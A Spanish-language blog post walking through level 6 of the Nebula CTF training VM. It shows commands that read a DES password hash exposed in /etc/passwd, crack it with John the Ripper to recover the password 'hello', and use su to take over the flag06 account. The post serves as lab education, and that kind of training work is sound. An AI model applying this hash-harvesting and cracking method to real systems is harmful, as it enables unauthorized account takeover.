Pages

viernes, 20 de julio de 2018

Nebula CTF - level06

Seguimos avanzando con la máquina Nebula, vamos por el nivel 6:

level06@nebula:/home/flag05$ cd /home/flag06
level06@nebula:/home/flag06$ ls -al
total 5
drwxr-x--- 2 flag06 level06   66 2011-11-20 20:51 .
drwxr-xr-x 1 root   root     140 2012-08-27 07:18 ..
-rw-r--r-- 1 flag06 flag06   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag06 flag06  3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag06 flag06   675 2011-05-18 02:54 .profile
level06@nebula:/home/flag06$ find / -user flag06 2>/dev/null
/home/flag06
/home/flag06/.bash_logout
/home/flag06/.bashrc
/home/flag06/.profile

Parece ser que flag06 no es demasiado productivo, ¿quién puede tener más información sobre este usuario?

level06@nebula:/home/flag06$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

Por supuesto que esto no debería de estar aquí :) Llamaremos a nuestro amigo john a ver si puede echarnos una mano:

dpc@kernelinside:~$ echo flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh > flag06
dpc@kernelinside:~$ john flag06
Created directory: /home/dpc/.john
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (flag06)
1g 0:00:00:00 100% 2/3 16.66g/s 12550p/s 12550c/s 12550C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Eureka! El password hello no parece muy seguro desde luego...

level06@nebula:/home/flag06$ su flag06
Password: 
sh-4.2$ getflag
You have successfully executed getflag on a target account

Pwned!

No hay comentarios:

Publicar un comentario

Protostar CTF - stack5

En ./stack5 continuamos con la dinámica de los dos últimos retos: dpc@kernelinside:~/protostar/bin$ ./stack5 test dpc@kernelinside:~/p...